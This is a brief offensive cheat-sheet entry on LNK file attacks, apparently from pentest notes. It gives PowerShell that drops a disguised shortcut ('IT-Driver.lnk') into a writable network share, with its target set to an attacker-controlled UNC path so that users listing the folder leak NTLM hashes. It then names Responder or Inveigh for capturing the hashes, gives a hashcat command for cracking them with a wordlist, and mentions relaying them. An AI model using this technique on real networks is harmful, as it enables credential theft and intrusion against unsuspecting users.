LNK File Attacks

Any writable directory (shares, nfs, locally) where users will list contents you can use a .lnk to steal hashes

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("\\DC01.domain.local\OpenShare\IT-Driver.lnk")
$lnk.TargetPath = "\\<AttackerIP>\@ico.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "IT Driver"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Monitor for traffic with Responder on linux or Inveigh on windows. Hash received? Try to crack it
hashcat -m 5600 userr.hash /usr/share/wordlists/rockyou.txt
OR: Relay Attacks